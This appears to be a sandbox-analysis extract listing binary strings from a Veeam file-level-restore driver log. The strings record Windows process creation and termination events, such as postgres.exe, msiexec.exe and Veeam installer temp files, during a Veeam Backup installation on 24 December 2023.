Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:52:42.830] [1e00:1844: 00] DETAIL: VS_PS: process creation: 6cc, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:54:16.784] [7a0:d80: 00] DETAIL: VS_PS: process termination: 7a0, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:08.842] [fbc:1620: 00] DETAIL: VS_PS: process termination: fbc, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:31.420] [102c:157c: 00] DETAIL: VS_PS: process termination: 102c, image filename: "\Device\HarddiskVolume2\Windows\System32\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:56:34.525] [1558:f7c: 00] DETAIL: VS_PS: process termination: 1558, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:13.157] [eb8:1a20: 00] DETAIL: VS_PS: process termination: eb8, image filename: "\Device\HarddiskVolume2\ProgramData\Veeam\Setup\Temp\c0bbd5db-d087-4a99-8f73-9406e734d226".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:36.109] [1aa4:1e98: 00] DETAIL: VS_PS: process creation: 178c, parent = 1aa4, image filename: "\Device\HarddiskVolume2\Windows\System32\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:10:33.891] [ea8:79c: 00] DETAIL: VS_PS: process termination: ea8, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:44.738] [614:2280: 00] DETAIL: VS_PS: process termination: 614, image filename: "\Device\HarddiskVolume2\Windows\System32\dllhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:39.470] [8d0:41c: 00] DETAIL: VS_PS: process termination: 8d0, image filename: "\Device\HarddiskVolume2\Windows\System32\rundll32.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:07.066] [22c8:125c: 00] DETAIL: VS_PS: process creation: 1950, parent = 22c8, image filename: "\Device\HarddiskVolume2\ProgramData\Veeam\Setup\Temp\02968286-124f-414f-b3c2-008af8b3eec6".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:32.996] [2c0:2148: 00] DETAIL: VS_PS: process creation: 1c80, parent = 2c0, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:13.143] [c10:588: 00] DETAIL: VS_PS: process creation: eb8, parent = c10, image filename: "\Device\HarddiskVolume2\ProgramData\Veeam\Setup\Temp\c0bbd5db-d087-4a99-8f73-9406e734d226".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:10.890] [ac8:4d0: 00] DETAIL: VS_PS: process termination: ac8, image filename: "\Device\HarddiskVolume2\Users\tt\AppData\Local\Temp\2771a38c-6550-4769-bbfd-433f2e077794\RPCAssemblyServer.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:02.338] [1040:1a40: 00] DETAIL: VS_PS: process termination: 1040, image filename: "\Device\HarddiskVolume2\Users\tt\AppData\Local\Temp\9b85966c-3a65-4ce7-bbc2-af331f4bda9c\RPCAssemblyServer.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:32.266] [99c:684: 00] DETAIL: VS_PS: process creation: b74, parent = 99c, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:32.066] [1b7c:1560: 00] DETAIL: VS_PS: process termination: 1b7c, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:07.030] [220c:1084: 00] DETAIL: VS_PS: process creation: 1574, parent = 220c, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:49:36.815] [340:14a8: 00] DETAIL: VS_PS: process creation: 21c4, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\backgroundTaskHost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:06.879] [6dc:128: 00] DETAIL: VS_PS: process creation: eb8, parent = 6dc, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:49:41.322] [21c4:e78: 00] DETAIL: VS_PS: process termination: 21c4, image filename: "\Device\HarddiskVolume2\Windows\System32\backgroundTaskHost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:39.359] [e84:14a8: 00] DETAIL: VS_PS: process termination: e84, image filename: "\Device\HarddiskVolume2\Windows\System32\rundll32.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:06:01.523] [340:17b8: 00] DETAIL: VS_PS: process creation: 12b4, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\dllhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:27.312] [10bc:b6c: 00] DETAIL: VS_PS: process creation: 17b4, parent = 10bc, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:19.959] [1aa4:1e98: 00] DETAIL: VS_PS: process creation: 2c0, parent = 1aa4, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:13.289] [2028:18c8: 00] DETAIL: VS_PS: process creation: 450, parent = 2028, image filename: "\Device\HarddiskVolume2\Windows\System32\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:45.070] [1fa4:2248: 00] DETAIL: VS_PS: process termination: 1fa4, image filename: "\Device\HarddiskVolume2\Windows\System32\vdsldr.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:39.139] [10a4:14a4: 00] DETAIL: VS_PS: process creation: 1b5c, parent = 10a4, image filename: "\Device\HarddiskVolume2\Windows\System32\rundll32.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:09.425] [b68:2380: 00] DETAIL: VS_PS: process creation: 1a9c, parent = b68, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\diskpart.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:52:20.350] [1e00:1844: 00] DETAIL: VS_PS: process creation: 188, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:52:20.390] [188:1a24: 00] DETAIL: VS_PS: process termination: 188, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:09:29.375] [1b44:1290: 00] DETAIL: VS_PS: process termination: 1b44, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:38.404] [1e58:1f94: 00] DETAIL: VS_PS: process termination: 1e58, image filename: "\Device\HarddiskVolume2\Users\tt\AppData\Local\Temp\df48baea-8e6f-4777-99e1-c16ec92335de\RPCAssemblyServer.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:38.889] [fec:aa0: 00] DETAIL: VS_PS: process creation: 1b5c, parent = fec, image filename: "\Device\HarddiskVolume2\Windows\System32\SearchFilterHost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:50.895] [2028:8ec: 00] DETAIL: VS_PS: process creation: 1528, parent = 2028, image filename: "\Device\HarddiskVolume2\Windows\System32\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:59.274] [868:f54: 00] DETAIL: VS_PS: process termination: 868, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:28.048] [1094:153c: 00] DETAIL: VS_PS: process termination: 1094, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:13.200] [990:ac0: 00] DETAIL: VS_PS: process termination: 990, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:27.626] [1e64:15d4: 00] DETAIL: VS_PS: process creation: 1ef8, parent = 1e64, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:27.707] [e28:fd8: 00] DETAIL: VS_PS: process termination: e28, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:52:06.603] [2b8:176c: 00] DETAIL: VS_PS: process creation: 1c1c, parent = 2b8, image filename: "\Device\HarddiskVolume2\Windows\System32\svchost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:28.799] [1a78:bf0: 00] DETAIL: VS_PS: process termination: 1a78, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:55:24.236] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1b60, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:09.373] [340:fd4: 00] DETAIL: VS_PS: process creation: 2254, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\vdsldr.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:26.661] [1454:1308: 00] DETAIL: VS_PS: process creation: 16c0, parent = 1454, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:06.835] [ac8:18a8: 00] DETAIL: VS_PS: process creation: 22bc, parent = ac8, image filename: "\Device\HarddiskVolume2\Windows\System32\wbem\mofcomp.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:56:34.493] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1558, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:13.186] [638:14dc: 00] DETAIL: VS_PS: process creation: 990, parent = 638, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:27.499] [17b4:22b4: 00] DETAIL: VS_PS: process termination: 17b4, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:13.139] [16c4:1a64: 00] DETAIL: VS_PS: process termination: 16c4, image filename: "\Device\HarddiskVolume2\ProgramData\Veeam\Setup\Temp\c0bbd5db-d087-4a99-8f73-9406e734d226".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:06.906] [6dc:128: 00] DETAIL: VS_PS: process termination: 6dc, image filename: "\Device\HarddiskVolume2\ProgramData\Veeam\Setup\Temp\11e8cbe1-0c86-4199-8801-5f78fcc713bb".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:48:46.144] [1ab4:22b8: 00] DETAIL: VS_PS: process termination: 1ab4, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:26.598] [b58:14ec: 00] DETAIL: VS_PS: process termination: b58, image filename: "\Device\HarddiskVolume2\Program Files (x86)\Microsoft\Edge\Application\msedge.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:26.586] [1424:614: 00] DETAIL: VS_PS: process termination: 1424, image filename: "\Device\HarddiskVolume2\Windows\servicing\TrustedInstaller.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:49:37.048] [340:1e0c: 00] DETAIL: VS_PS: process creation: d24, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\backgroundTaskHost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:59.306] [c60:1a24: 00] DETAIL: VS_PS: process creation: 1888, parent = c60, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\diskpart.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:52:06.626] [10ac:a0c: 00] DETAIL: VS_PS: process creation: 6d0, parent = 10ac, image filename: "\Device\HarddiskVolume2\Windows\System32\UsoClient.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:37.494] [c10:73c: 00] DETAIL: VS_PS: process termination: c10, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:53:38.867] [10ac:cfc: 00] DETAIL: VS_PS: process termination: 10ac, image filename: "\Device\HarddiskVolume2\Windows\System32\MoUsoCoreWorker.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:31.844] [69c:193c: 00] DETAIL: VS_PS: process termination: 69c, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:13.992] [2254:b80: 00] DETAIL: VS_PS: process termination: 2254, image filename: "\Device\HarddiskVolume2\Windows\System32\vdsldr.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:07.107] [22c8:125c: 00] DETAIL: VS_PS: process creation: fc0, parent = 22c8, image filename: "\Device\HarddiskVolume2\ProgramData\Veeam\Setup\Temp\02968286-124f-414f-b3c2-008af8b3eec6".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:11:06.324] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1aa4, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:27.115] [1984:10b8: 00] DETAIL: VS_PS: process creation: dd4, parent = 1984, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:31.374] [1fc0:1b34: 00] DETAIL: VS_PS: process termination: 1fc0, image filename: "\Device\HarddiskVolume2\Windows\System32\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:50.846] [2028:8ec: 00] DETAIL: VS_PS: process creation: 15a8, parent = 2028, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:07:58.473] [d24:1924: 00] DETAIL: VS_PS: process termination: d24, image filename: "\Device\HarddiskVolume2\Windows\System32\smartscreen.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:50:40.909] [1620:23d0: 00] DETAIL: VS_PS: process termination: 1620, image filename: "\Device\HarddiskVolume2\Windows\System32\RuntimeBroker.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:29.148] [1b0:2380: 00] DETAIL: VS_PS: process creation: 17d8, parent = 1b0, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:39.247] [10a4:201c: 00] DETAIL: VS_PS: process creation: e84, parent = 10a4, image filename: "\Device\HarddiskVolume2\Windows\System32\rundll32.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:26.458] [170c:1cc8: 00] DETAIL: VS_PS: process creation: 1110, parent = 170c, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:13.094] [ce0:17c4: 00] DETAIL: VS_PS: process termination: ce0, image filename: "\Device\HarddiskVolume2\ProgramData\Veeam\Setup\Temp\e27b42e7-25a7-4bc6-ad11-70160686386c".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:49:38.269] [1e2c:1ba0: 00] DETAIL: VS_PS: process termination: 1e2c, image filename: "\Device\HarddiskVolume2\Windows\System32\svchost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:26.098] [340:fd4: 00] DETAIL: VS_PS: process creation: 20dc, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\dllhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:07:11.764] [e7c:2364: 00] DETAIL: VS_PS: process termination: e7c, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:59.881] [1528:ec0: 00] DETAIL: VS_PS: process termination: 1528, image filename: "\Device\HarddiskVolume2\Windows\System32\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:11:48.882] [ac8:22fc: 00] DETAIL: VS_PS: process termination: ac8, image filename: "\Device\HarddiskVolume2\Program Files (x86)\Microsoft\Edge\Application\msedge.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:10.233] [fc0:1020: 00] DETAIL: VS_PS: process termination: fc0, image filename: "\Device\HarddiskVolume2\Windows\System32\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:56.593] [1e00:1844: 00] DETAIL: VS_PS: process creation: 934, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:56:43.727] [ad4:23ac: 00] DETAIL: VS_PS: process creation: 2244, parent = ad4, image filename: "\Device\HarddiskVolume2\Program Files\Common Files\Veeam\Backup and Replication\Mount Service\Veeam.Backup.MountService.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:13.146] [eb8:1a20: 00] DETAIL: VS_PS: process creation: 1a8c, parent = eb8, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:08:19.068] [1e00:1844: 00] DETAIL: VS_PS: process creation: 10bc, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:48:16.713] [1e00:1844: 00] DETAIL: VS_PS: process creation: 15fc, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:13:12.001] [318:c48: 00] DETAIL: VS_PS: process creation: 17b8, parent = 318, image filename: "\Device\HarddiskVolume2\Program Files\Common Files\Veeam\Backup and Replication\Mount Service\Veeam.Backup.MountService.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:29.046] [340:b4c: 00] DETAIL: VS_PS: process creation: 109c, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\vdsldr.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:12:47.087] [1d04:1bc4: 00] DETAIL: VS_PS: process termination: 1d04, image filename: "\Device\HarddiskVolume2\Windows\System32\backgroundTaskHost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:11:16.045] [e78:5f0: 00] DETAIL: VS_PS: process termination: e78, image filename: "\Device\HarddiskVolume2\Windows\System32\audiodg.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:08:24.008] [1b58:484: 00] DETAIL: VS_PS: process termination: 1b58, image filename: "\Device\HarddiskVolume2\Windows\System32\SearchFilterHost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:07:41.545] [1984:21ac: 00] DETAIL: VS_PS: process termination: 1984, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:12:55.153] [340:1e10: 00] DETAIL: VS_PS: process creation: 1388, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\dllhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:12.986] [2028:18c8: 00] DETAIL: VS_PS: process creation: c10, parent = 2028, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:29.192] [1e00:1844: 00] DETAIL: VS_PS: process creation: c7c, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:30.752] [b40:186c: 00] DETAIL: VS_PS: process termination: b40, image filename: "\Device\HarddiskVolume2\Windows\System32\dllhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:55:08.243] [e54:17c4: 00] DETAIL: VS_PS: process termination: e54, image filename: "\Device\HarddiskVolume2\Windows\System32\svchost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:53:37.430] [61c:f60: 00] DETAIL: VS_PS: process termination: 61c, image filename: "\Device\HarddiskVolume2\Windows\System32\audiodg.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:09:29.336] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1b44, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:33.586] [a0c:20e8: 00] DETAIL: VS_PS: process termination: a0c, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:53:16.575] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1444, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:08:52.766] [6dc:1b60: 00] DETAIL: VS_PS: process termination: 6dc, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:12:45.914] [2b8:18c8: 00] DETAIL: VS_PS: process creation: 1df0, parent = 2b8, image filename: "\Device\HarddiskVolume2\Windows\System32\svchost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:39.018] [10a4:2118: 00] DETAIL: VS_PS: process creation: 187c, parent = 10a4, image filename: "\Device\HarddiskVolume2\Windows\System32\rundll32.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:07.140] [fc0:378: 00] DETAIL: VS_PS: process termination: fc0, image filename: "\Device\HarddiskVolume2\ProgramData\Veeam\Setup\Temp\02968286-124f-414f-b3c2-008af8b3eec6".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:07.956] [f4c:18e4: 00] DETAIL: VS_PS: process termination: f4c, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:06:10.685] [2028:1f14: 00] DETAIL: VS_PS: process creation: 1a90, parent = 2028, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:07.144] [1d14:b78: 00] DETAIL: VS_PS: process termination: 1d14, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:37.485] [1e64:1e60: 00] DETAIL: VS_PS: process termination: 1e64, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:57.299] [1a74:16b8: 00] DETAIL: VS_PS: process creation: 868, parent = 1a74, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:49:57.147] [1e00:1844: 00] DETAIL: VS_PS: process creation: 12e0, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:27.300] [dd4:86c: 00] DETAIL: VS_PS: process termination: dd4, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:28.044] [374:ae8: 00] DETAIL: VS_PS: process termination: 374, image filename: "\Device\HarddiskVolume2\Program Files\Common Files\Veeam\Backup and Replication\Mount Service\Veeam.Backup.MountService.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:09.117] [2028:eac: 00] DETAIL: VS_PS: process creation: 1460, parent = 2028, image filename: "\Device\HarddiskVolume2\Windows\System32\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:27.714] [1e64:15d4: 00] DETAIL: VS_PS: process creation: 1ba4, parent = 1e64, image filename: "\Device\HarddiskVolume2\Program Files (x86)\Veeam\Backup Transport\GuestInteraction\VSS\VeeamPSDirectCtrl_X64.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:33.339] [2c0:2148: 00] DETAIL: VS_PS: process creation: 16c4, parent = 2c0, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:08.762] [1e00:1844: 00] DETAIL: VS_PS: process creation: fbc, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:50:40.988] [340:14a8: 00] DETAIL: VS_PS: process creation: 1bb8, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\RuntimeBroker.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:13:12.009] [17b8:f2c: 00] DETAIL: VS_PS: process creation: a0c, parent = 17b8, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:56:40.552] [3ac:1894: 00] DETAIL: VS_PS: process termination: 3ac, image filename: "\Device\HarddiskVolume2\Windows\System32\svchost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:59.881] [15a8:1fb4: 00] DETAIL: VS_PS: process termination: 15a8, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:59.856] [1ddc:1c50: 00] DETAIL: VS_PS: process termination: 1ddc, image filename: "\Device\HarddiskVolume2\Windows\System32\dllhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:32.196] [2c0:2148: 00] DETAIL: VS_PS: process creation: 99c, parent = 2c0, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:09.411] [2274:1f08: 00] DETAIL: VS_PS: process termination: 2274, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:06:01.661] [2028:1f14: 00] DETAIL: VS_PS: process creation: 318, parent = 2028, image filename: "\Device\HarddiskVolume2\Windows\System32\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:13:02.969] [1388:220c: 00] DETAIL: VS_PS: process termination: 1388, image filename: "\Device\HarddiskVolume2\Windows\System32\dllhost.exe".
